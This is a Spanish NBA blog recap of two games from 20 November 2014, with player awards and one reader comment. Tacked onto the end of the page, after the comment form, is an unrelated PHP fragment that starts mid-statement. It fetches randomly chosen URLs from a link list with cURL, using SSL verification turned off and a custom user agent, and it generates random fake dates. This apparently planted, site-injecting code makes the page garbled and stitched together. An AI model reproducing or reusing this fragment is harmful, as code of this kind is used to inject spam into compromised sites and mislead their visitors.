La crónica: La ley de la gravedad

21 de November de 2014 por MagicJohnson32

Las cosas caen por su propio peso. Las razones, la lógica, se suelen acabar imponiendo, más tarde o más temprano. Y, como muestra, la jornada de anoche en la NBA, donde las bajas de Bulls y Heat se manifestaron para restar emoción al clásico double header de los jueves.

Os lo contamos.

heat_clip

L.A. Clippers 110 – Miami Heat 93

Un asalto, o ni eso, duró el combate entre Clippers y Heat. Los californianos se impusieron por K.O. en Miami tras desplegar en el primer cuarto una tormenta perfecta en forma de parcial de 39-15 que convirtió el resto de la velada en poco más que un trámite. Los Clippers anotaron en once posesiones consecutivas, con Chris Paul y Blake Griffin al frente de las operaciones, y extendieron su dominio a todas las áreas. Anotaron 13 triples, aplastaron a su rival en la pintura e hicieron papilla la defensa de los Heat en transición y con un excelente movimiento de balón, como prueban las 31 asistencias que registraron en sus 43 canastas. El buen partido de Bosh y Napier y el regreso de Deng no compensaron la ausencia de Wade por cuarto partido seguido, un periodo en el que Miami solo ha logrado una victoria. Los Clippers, por su parte, arrancan la gira de siete partidos con dos triunfos, ambos en Florida, y ya empiezan a mirar hacia arriba tras su dubitativo inicio de campaña.

Chicago Bulls 88 – Sacramento Kings 103

De nuevo sin Derrick Rose ni Pau Gasol, y tras su meritoria victoria en el Staples, los Bulls no fueron rival ante un equipo con la confianza inflada como un globo como son estos Sacramento Kings, especialmente motivados ante la rara ocasión que para el equipo suponía figurar en un partido televisado para todo el país. La franquicia aprovechó para homenajear en la previa a Mike Bibby y Chris Webber, y tal vez eso les distrajo en el arranque de partido. Empezaron mejor los de Chicago, algo que exigió que en los tres cuartos restantes los Kings hicieran gala de esa confianza recientemente descubierta y que ha convertido a Cousins, Gay y Collison en uno de los mejores tríos de este inicio de curso. No solo eso. Derrick Williams y Omir Casspi fueron determinantes frente al, un día más, excelente partido de Jimmy Butler, que esta vez no pudo evitar la primera derrota como visitantes de los Bulls esta temporada.

cousins_bulls

PREMIOS

MVP: Habemus Big Three en Sacramento. 59 puntos, 27 rebotes y 19 asistencias entre Cousins, Gay y Collison para unos Kings más cercanos a la cabeza que a las últimas posiciones del Oeste. Igualmente dominante fue el trío principal de los Clippers, con 64 puntos, 20 rebotes y 17 asistencias entre CP, Griffin y Jordan.

Rookie: Buena aportación de Niko Mirotic con 7 puntos (3/6 tiros), 5 rebotes y 2 tapones en Sacramento. Pero el mejor rookie del día fue Shabazz Napier, que ante la lesión que sufrió Norris Cole aprovechó la oportunidad para anotar 17 puntos, con 5 rebotes y 3 asistencias en 32 minutos.

Sorpresa: Los 14 puntos sin fallo de Omir Casspi (5/5 en tiros de campo, 4/4 en tiros libres) fueron una de las claves del triunfo de los Kings.

Decepción: Más que rendimientos individuales, lo que más decepcionó fue la poca competitividad y nula emoción de los dos partidos jugados anoche y la ausencia de varias estrellas, lo que resultó en una jornada descafeinada.

Mayor esfuerzo en vano: Ya no es candidato a sorpresa del día, y se le queda corta la consideración como uno de los mejores de su equipo. Jimmy Butler es, sin lugar a dudas, uno de los mejores jugadores del primer mes de la regular season 2014-2015, y nuestro galardonado como mayor esfuerzo en vano de anoche con sus 23 puntos (11/18 tiros), 8 rebotes, 2 robos y 1 asistencia.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. franitis dice:
    #1

    Ese Butler… Lo cogí en el puesto 78 del draft de la Fantasy League… ¿Puede ser el sleeper del draft sin dudas? XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>